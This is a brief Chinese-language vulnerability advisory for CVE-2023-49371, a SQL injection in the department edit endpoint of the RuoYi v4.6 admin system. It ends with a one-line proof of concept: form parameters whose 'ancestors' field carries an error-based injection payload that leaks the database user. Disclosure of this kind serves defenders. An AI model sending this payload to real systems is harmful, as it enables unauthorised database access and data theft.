CVE-2023-49371｜RuoYi 若依后台管理系统存在SQL注入漏洞

0x00 前言

RuoYi是一个后台管理系统，基于经典技术组合（Spring Boot、Apache Shiro、MyBatis、Thymeleaf）主要目的让开发者注重专注业务，降低技术难度，从而节省人力成本，缩短项目周期，提高软件安全质量。

0x01 漏洞描述

/system/dept/edit存在SQL漏洞

0x02 CVE编号

CVE-2023-49371

0x03 影响版本

RuoYi v4.6版本

0x04 漏洞详情

POC：

DeptName=1&deptid=100&ParentId=12&Status=0&ordernum=1&ancestors=0)or(extractvalue(1,concat((select user()))));#